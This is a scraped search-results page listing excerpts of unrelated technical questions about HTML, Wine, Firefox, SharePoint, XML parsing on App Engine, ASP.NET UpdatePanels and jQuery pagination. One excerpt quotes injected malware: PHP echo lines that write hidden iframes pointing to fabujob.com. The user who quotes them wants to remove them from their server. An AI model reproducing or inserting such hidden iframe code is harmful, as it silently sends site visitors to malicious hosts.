Search Results

Search found 45245 results on 1810 pages for 'html content extraction'.

Page 241/1810 | < Previous Page | 237 238 239 240 241 242 243 244 245 246 247 248  | Next Page >

  • Search for index.php and index.html and replace string

    - by Jonas
    Hello. I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s): echo "<iframe src=\"http://fabujob.com/?click=AD4A4\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; echo "<iframe src=\"http://fabujob.com/?click=AC785\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; So the parameter after "click=" always changes. These two were only examples. Is there a way to do that quick and fast? . . EDIT: It is on my webserver, so no use of find...

    Read the article

  • WINEHQ - wine_gecko won't init - HTML Rendering disabled

    - by Nick
    Hello Super Users, I'm currently trying to get a windows compiled program to work through Wine to run on Linux and MacOSX. When I run the program through wine, it prompts me to install Gecko which I do. Later on in the program, it attempts to use MSHTML to render HTML but I get these error messages on my console instead. err:mshtml:init_xpcom NS_InitXPCOM2 failed: 80004005 err:mshtml:HTMLDocument_Create Failed to init Gecko, returning CLASS_E_CLASSNOTAVAILABLE fixme:ole:CoCreateInstance no instance created for interface {00000000-0000-0000-c000-000000000046} of class {25336920-03f9-11cf-8fd0-00aa00686f13}, hres is 0x80040111 I'm using Wine 1.1.34 and a similar bug was supposedly fixed in 1.1.33 http://bugs.winehq.org/show_bug.cgi?id=12578 I've been at this all afternoon, is there anything I'm missing? Thanks, Nick

    Read the article

  • Firefox: Load local html file when opening new tab

    - by user81430
    A couple of months ago, I configured Firefox to load a local html file containing my commonly-used links whenever I open a new tab This week I've been trying to find where I set this up. I cannot find this setting anywhere in the Firefox options. Somewhere there is (or was) a dialog box with an item that said something like 'Page to load in new tab'. Where was it? Could Mozilla have removed it in the latest upgrade? I'm not using any extensions but LastPass, so it's not controlled by an extension.

    Read the article

  • SharePoint Server 2007 and HTML Forms - How to control access rights

    - by Anarkie
    I'm working with Hosted SharePoint 2007 with Forms Server. I need to allow client access to submit HTML forms designed in Infopath. Problem is, I need to make sure the clients don't see the library. There is sensitive data that will be on these forms. I also need to have a repeated library that is based on the Internal Admin records and requirements. Outside of making a seperate library per customer, does anyone have any suggestions? My Goal: 1: Customers enter their requests through a link or provided page 2: Internally address the requests and perform required arrangements, add billing and payment fields 3: Have SharePoint metrics, reports, etc... based on the provided intormation and status. Thanks in Advance!!

    Read the article

  • Circumventing a manual HTML login page for "unclassified" websites

    - by auramo
    The IT department just made my life a little bit harder again: they introduced a manual HTML login page for all websites they have not "classified". This means that all the applications which try to access unclassified websites for e.g. downloading plugins do not work. Examples: Eclipse plugin installation, Maven builds etc. What would be the easiest workaround for this? The best I've come up with is try to extend/customize Ruby's httpproxy.rb that comes with Webrick. I would automate the manual login process whenever that login response page is detected. This sounds quite painful, and I think there might/should be simpler options?

    Read the article

  • Circumventing a manual HTML login page for "unclassified" websites (automation purposes, credentials

    - by auramo
    The IT department just made my life a little bit harder again: they introduced a manual HTML login page for all websites they have not "classified". This means that all the applications which try to access unclassified websites for e.g. downloading plugins do not work. Examples: Eclipse plugin installation, Maven builds etc. What would be the easiest workaround for this? The best I've come up with is try to extend/customize Ruby's httpproxy.rb that comes with Webrick. I would automate the manual login process whenever that login response page is detected. This sounds quite painful, and I think there might/should be simpler options?

    Read the article

  • Search Replace extended in a html file

    - by Fake4d
    i have a little question. I have a big html file and want to replace lots of things inside a lot of times. The only problem i cant solve is a replace with a variable. Example: <image src="start_files\0002.jpg" style="width:216pt; height:162"> should be transformed in <a href="start_files\0002.jpg" target="_blank"><image src="start_files\0002.jpg" style="width:216pt; height:162"></a> do you have an idea how to do it? I have a windows system with Notepad2 and Notepad++ and i could install a new tool if needed. (like Windows SED). The best solution would be a batch solution where i can add other transformations. Hope you have got good ideas! Thanks forward, Fake4d

    Read the article

  • "Content is not allowed in prolog" when parsing perfectly valid XML on GAE

    - by Adrian Petrescu
    Hey guys, I've been beating my head against this absolutely infuriating bug for the last 48 hours, so I thought I'd finally throw in the towel and try asking here before I throw my laptop out the window. I'm trying to parse the response XML from a call I made to AWS SimpleDB. The response is coming back on the wire just fine; for example, it may look like: <?xml version="1.0" encoding="utf-8"?> <ListDomainsResponse xmlns="http://sdb.amazonaws.com/doc/2009-04-15/"> <ListDomainsResult> <DomainName>Audio</DomainName> <DomainName>Course</DomainName> <DomainName>DocumentContents</DomainName> <DomainName>LectureSet</DomainName> <DomainName>MetaData</DomainName> <DomainName>Professors</DomainName> <DomainName>Tag</DomainName> </ListDomainsResult> <ResponseMetadata> <RequestId>42330b4a-e134-6aec-e62a-5869ac2b4575</RequestId> <BoxUsage>0.0000071759</BoxUsage> </ResponseMetadata> </ListDomainsResponse> I pass in this XML to a parser with XMLEventReader eventReader = xmlInputFactory.createXMLEventReader(response.getContent()); and call eventReader.nextEvent(); a bunch of times to get the data I want. Here's the bizarre part -- it works great inside the local server. The response comes in, I parse it, everyone's happy. The problem is that when I deploy the code to Google App Engine, the outgoing request still works, and the response XML seems 100% identical and correct to me, but the response fails to parse with the following exception: com.amazonaws.http.HttpClient handleResponse: Unable to unmarshall response (ParseError at [row,col]:[1,1] Message: Content is not allowed in prolog.): <?xml version="1.0" encoding="utf-8"?> <ListDomainsResponse xmlns="http://sdb.amazonaws.com/doc/2009-04-15/"><ListDomainsResult><DomainName>Audio</DomainName><DomainName>Course</DomainName><DomainName>DocumentContents</DomainName><DomainName>LectureSet</DomainName><DomainName>MetaData</DomainName><DomainName>Professors</DomainName><DomainName>Tag</DomainName></ListDomainsResult><ResponseMetadata><RequestId>42330b4a-e134-6aec-e62a-5869ac2b4575</RequestId><BoxUsage>0.0000071759</BoxUsage></ResponseMetadata></ListDomainsResponse> javax.xml.stream.XMLStreamException: ParseError at [row,col]:[1,1] Message: Content is not allowed in prolog. at com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl.next(Unknown Source) at com.sun.xml.internal.stream.XMLEventReaderImpl.nextEvent(Unknown Source) at com.amazonaws.transform.StaxUnmarshallerContext.nextEvent(StaxUnmarshallerContext.java:153) ... (rest of lines omitted) I have double, triple, quadruple checked this XML for 'invisible characters' or non-UTF8 encoded characters, etc. I looked at it byte-by-byte in an array for byte-order-marks or something of that nature. Nothing; it passes every validation test I could throw at it. Even stranger, it happens if I use a Saxon-based parser as well -- but ONLY on GAE, it always works fine in my local environment. It makes it very hard to trace the code for problems when I can only run the debugger on an environment that works perfectly (I haven't found any good way to remotely debug on GAE). Nevertheless, using the primitive means I have, I've tried a million approaches including: XML with and without the prolog With and without newlines With and without the "encoding=" attribute in the prolog Both newline styles With and without the chunking information present in the HTTP stream And I've tried most of these in multiple combinations where it made sense they would interact -- nothing! I'm at my wit's end. Has anyone seen an issue like this before that can hopefully shed some light on it? Thanks!

    Read the article

  • How to notify client about updated UpdatePanel content on server side

    - by csh1981
    I have a problem with UpdatePanel.Update() which works initially but then stops. I have tumbled with this problem for some time and some background is needed so please read ahead. I have an ASP.net application in which I have a subpage that display computed information in graphs. Each graph is embedded in an UpdatePanel. The graph is a user control that uses the standard asp:Chart for display. My task is to enable this page with AJAX capabilities so the page is responsive during postbacks. When I access this page from another page, during the initial page rendering, I use a wait dialog for each graph and a pageload event on the client side. In the client event, a hidden button is clicked which a server event handles (the hidden button is inside an UpdatePanel so the postback is asynchronous). Each graph is computed and the UpdatePanels are in turn updated with the Chart content. This is done using UpdatePanel.Update. And it is successful. However, I also have some RadioButtons on the page. These are dynamically created. The purpose of them is to switch graph type --- to show the same data in a different way. Same type of time consuming computation is needed in order to do so. I subscribe on each RadioButton's OnCheckedChanged event and the postback is asynchronous since the radiobuttons are inside an UpdatePanel. In the server event handler I determine the type of graph and use this as an input to the Chart control. I then remove the old Chart control from my Panel and adds new Chart and then I call UpdatePanel.Update(). But with no success. Nothing happens, no errors, nothing. Why is this?? I think this is strange because if I compute every Chart data in the initial rendering instead of using the "Wait dialog"-solution described earlier then I can select graph types successfully and all subsequent AJAX requests work as intended. Also, the same code (computing the chart, removal, and adding the Chart control to Panel and UpdatePanel.Update()) is hit during the initial rendering of the page, and it works only the first time. Here is the method that computes the graph and adds it to the panel and update the UpdatePanel: public void UpdateGraph(GraphType type, GraphMapper mapper) { //Panel is the content of UpdatePanelGraph's Panel.Controls.Clear(); chart = new Chart(type, mapper); //Computation happens inside here panel.Controls.Add(chart); //UpdatePanelGraph is in UpdateMode Conditional and has //ChildrenAsTriggers set to false UpdatePanelGraph.Update(); } I really need a way for these radiobuttons to work, possible using some clientside JavaScript or another way of handling things on the server side. I have thought about using a JavaScript postback call on the UpdatePanel instead of the UpdatePanel.Update(). However, the issue I have here is how to notify the client side when the server side is finished with computing the graph? An plausible explanation of the strange behavior is also much appreciated. Any help appreciated, thanks

    Read the article

  • Showing updated content on the client

    - by tazim
    Hi, I have a file on server which is viewed by the client asynchronously as and when required . The file is going to get modified on server side . Also updates are reflected in browser also In my views.py the code is : def showfiledata(request): somecommand ="ls -l > /home/tazim/webexample/templates/tmp.txt" with open("/home/tazim/webexample/templates/tmp.txt") as f: read_data = f.read() f.closed return_dict = {'filedata':read_data} json = simplejson.dumps(return_dict) return HttpResponse(json,mimetype="application/json") Here, entire file is sent every time client requests for the file data .Instead I want that only modified data sholud be received since sending entire file is not feasible if file size is large . My template code is : < html> < head> < script type="text/javascript" src="/jquerycall/">< /script> < script type="text/javascript"> $(document).ready(function() { var setid = 0; var s = new String(); var my_array = new Array(); function displayfile() { $.ajax({ type:"POST", url:"/showfiledata/", datatype:"json", success:function(data) { s = data.filedata; my_array = s.split("\n"); displaydata(my_array); } }); } function displaydata(my_array) { var i = 0; length = my_array.length; for(i=0;i<my_array.length;i++) { var line = my_array[i] + "\n"; $("#textid").append(line); } } $("#b1").click(function() { setid= setInterval(displayfile,1000); }); $("#b2").click(function() { clearInterval(setid); }) }); < /script> < /head> < body> < form method="post"> < button type="button" id="b1">Click Me< /button>< br>< br> < button type="button" id="b2">Stop< /button>< br>< br> < textarea id="textid" rows="25" cols="70" readonly="true" disabled="true">< /textarea> < /form> </body> </html> Any Help will be beneficial . some sample code will be helpful to understand

    Read the article

  • How to Load In Content with jQuery?

    - by ClarkSKent
    Hello, I am trying to add ajax functionality to my pagination so the content loads in the same page instead of the user having to navigate to another page when clicking the page links. I should mention that I am using this php pagination class. Being new to jquery, I am unsure of how to properly do this with the pagination class. This is what the main page looks like: <?php $categoryId=$_GET['category']; echo $categoryId; ?> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script> <script type="text/javascript" src="jquery_page.js"></script> <?php //Include the PS_Pagination class include('ps_pagination.php'); //Connect to mysql db $conn = mysql_connect('localhost', 'root', 'root'); mysql_select_db('ajax_demo',$conn); $sql = "select * from explore where category='$categoryId'"; //Create a PS_Pagination object $pager = new PS_Pagination($conn, $sql, 3, 11, 'param1=value1&param2=value2'); //The paginate() function returns a mysql //result set for the current page $rs = $pager->paginate(); //Loop through the result set echo "<table width='800px'>"; while($row = mysql_fetch_assoc($rs)) { echo "<tr>"; echo"<td>"; echo $row['id']; echo"</td>"; echo"<td>"; echo $row['site_description']; echo"</td>"; echo"<td>"; echo $row['site_price']; echo"</td>"; echo "</tr>"; } echo "</table>"; echo "<ul id='pagination'>"; echo "<li>"; //Display the navigation echo $pager->renderFullNav(); echo "</li>"; echo "</ul>"; ?> <div id="loading" ></div> <div id="content" ></div> <a href="#" class="category" id="marketing">Marketing</a> <a href="#" class="category" id="automotive">Automotive</a> <a href="#" class="category" id="sports">Sports</a> Any help on this would be great. Thanks.

    Read the article

  • Single page not appearing in Google Search

    - by Dan
    Description I have a static franchise website which has various sub pages each dedicated to an individual franchisee. For each franchisee the page, the only thing slightly similar between all of them are the page titles, they follow this structure: <title> Welcome to THE_COMPANY - PRODUCT_DESCRIPTION Services, THE_LOCATION </title> THE_COMPANY and PRODUCT_DESCRIPTION are the same across all franchisees, however THE_LOCATION changes depeding on where they are located in the UK. Each franchisee page has the following <meta /> tags: <meta name="DC.creator" content="user"/> <meta name="DC.format" content="text/html"/> <meta name="DC.language" content="en"/> <meta name="DC.date.modified" content="2014-01-23T11:22:31+00:00"/> <meta name="DC.date.created" content="2014-01-23T11:22:09+00:00"/> <meta name="DC.type" content="Page"/> <meta name="DC.distribution" content="Global"/> <meta name="robots" content="ALL"/> <meta name="distribution" content="Global"/> The main content on each franchisee page is completely different. The Problem There is one particular franchisee page, located in Area A.. Which will not appear in Google Search results at all. However every single other franchisee (if you Google Search for "THE_COMPANY, THE_LOCATION" is number 1). And if I do the same search on Bing, Yahoo or DuckDuckGo, the Area A franchisee is the first result on all of them. Has Google for some reason black listed one page on the site? What I Have Tried Ensuring the page is referenced in my sitemap.xml file 'Fetching as Google Bot' the link www.the_company.co.uk/areaa When that came back as OK I would submit to index Resubmitting the sitemap.xml file in Webmaster Tools Linking to the Area A page from another pages content For this I also waited about 3 weeks before checking again to give Google time to re-index Making a change to the page content and waiting another 2 / 3 weeks Removing the page completely and recreating it with an alternative URL The closest thing I have found to this issue is this StackOverflow question but this particular franchisee has existed for almost a year, it used to appear on Google searches however no longer does. I'm guessing the Panda update wasn't too happy with something on the page, but it hasn't effected anything else on the site and I am at a loss for things to try. I would greatly appreciate any information or thoughts as to what could have caused this Thanks. Update In line with Daniel Fukudas answer below, I have followed some of his steps but everything seems to check out alright: HTTP Headers HTTP/1.1 200 OK => Date => Tue, 25 Feb 2014 16:31:29 GMT Server => Zope/(2.12.16, python 2.6.6, linux2) ZServer/1.1 Content-Length => 40078 Expires => Sat, 01 Jan 2000 00:00:00 GMT Content-Type => text/html;charset=utf-8 Content-Language => en Vary => Accept-Encoding Connection => close Robots <meta /> tag: <meta name="robots" content="ALL"/> I have updated this <meta /> tag to read content="INDEX" instead now. robots.txt: User-agent: * Disallow: User-Agent: Googlebot Disallow: /*sendto_form$ Disallow: /*folder_factories$ Using site:THE_COMPANY.co.uk: Searching for 'AREA A site:THE_COMPANY.co.uk' does not return the page, but regardless of that searching just for site:THE_COMPANY.co.uk will not necessarily return every indexed page, or so I understand... Update It appears Google likes to drop pages every now and then from the index, despite my steps above, I left the site alone and the page appeared back in the SERPs by itself.

    Read the article

  • ASP.NET MVC Html.DropDownListFor Select value

    - by user295541
    Hi, I have a little problem. I use the Html.DropDownListFor helper to render a dropdown list to the client. But I can't set the selected value in dropdown list. <%= Html.DropDownListFor(model = Model.CalculationClassCollection, new SelectList(Model.CalculationClassCollection, "ID", "Name", 3 ), new { id = "ddCalculationClass" })% Anybody can help me?

    Read the article

  • Html editor (WYSIWYG) for WinForms (C#)

    - by Raf
    Hi, As in the question. Do you know any good (it would be nice if free) WYSIWYG html editor for WinForms (C#)? There is only one requirement: it has to be manage code only (by this I mean, it can't use mshtml COM object (WebBrowser control)). I've found this: http://www.modeltext.com/html/ but there is no download/buy option. I will be really thankful for any answer

    Read the article

  • Add onblur event to ASP.Net MVC's Html.TextBox

    - by justSteve
    What's the correct syntax for an HTML helper (in MVC2) to define an onblur handler where the textbox is generated with code like: <%=Html.TextBox( "ChooseOptions.AddCount" + order.ID, (order.Count > 0) ? AddCount.ToString() : "", new { @class = "{number: true} small-input" } ) thx

    Read the article

  • Can I use Html Agility Pack for this?

    - by chobo2
    Hi I could not find any tutorials on their site. I am wondering can I use Html Agility Pack and use it to parse a string? Like say I have string = "<b>Some code </b> could I use agility pack to get rid of the <b> tags? All the examples I seen so far have been loading like html documents.

    Read the article

  • HTML text editor in ASP.NET 2.0

    - by Sachin Gaur
    I am developing a web application where user has the option to send email to other users. I am looking for any in-built HTML text editor for ASP.NET 2.0. I know latest AJAX release for .NET 3.5 has provided this control. I am looking for a similar control but in ASP.NET 2.0. Is there any other UI control that is build using Javscript or jQuery, which can be used to allow user to enter HTML formatted message?

    Read the article

  • How to update multiple elements with one MooTools Request.HTML call

    - by Mario
    Does anyone know if, using one Request.HTML call from MooTools, it is possible to somehow update more than one element in a webpage? The current call I have is: var req = new Request.HTML({update: $('content')}).get('../latest_events'); This updates the content div in my page with the "../latest_events" page. Is there a way to update other divs with the "../latest_events" page using this same call, or do I have to just use separate calls?

    Read the article

  • Why Basic HTML gets loaded

    - by Priyanka
    Hello... When I browse internet,basic HTML gets loaded on my computer. For eg.- for orkut or facebook login,only the text box appears,and when inputs are provided,and redirection is done,it says "error on page". Even on google search,basic HTML gets loaded on my computer.. I tried installing new Internet version i.e., IE8,but the same problem. Kildly provide a good solution to this problem.

    Read the article

  • Render ASP in pages with .html extension in Windows CE

    - by Chris
    I want to be able to use the .html extension to render ASP pages. I am using Windows CE 6 at the moment with the default web server, ASP is turned on. I have attempted to add the "ScriptMap" (via) key to the HKEY_LOCAL_MACHINE\COMM\HTTPD\ScriptMap subkey with the value ".html"="\Windows\asp.dll" but this doesn't seem to work. What am I doing wrong?

    Read the article

  • html editor properties

    - by Ranjana
    i have used the html editor to my page <%@ Register Assembly="AjaxControlToolkit" Namespace="AjaxControlToolkit.HTMLEditor" TagPrefix="cc1" % i have sent the values to the database as txtjobdesc.Content.Tostring(); but if i type just a paragraph in the editor it is displaying the same Description. But if i use any Bullets and Highlighted words it is displaying as words above the bulleted words.how to make it display as a html description pls help me out..

    Read the article

  • HTML Comment-out Add-In

    - by Velika
    Here is an old add in to quickly comment out HTML code. Maybe I am missing it, but it seems like there is a shortcut in VS2010 to scratch your tail with one click but commenting out HTML code is still awkward as hell. What's the easiest way to get a function like this working? Can I expect any add-ins that were written for older versions of VS to work in VS2010 w/o an upgrade?

    Read the article

< Previous Page | 237 238 239 240 241 242 243 244 245 246 247 248  | Next Page >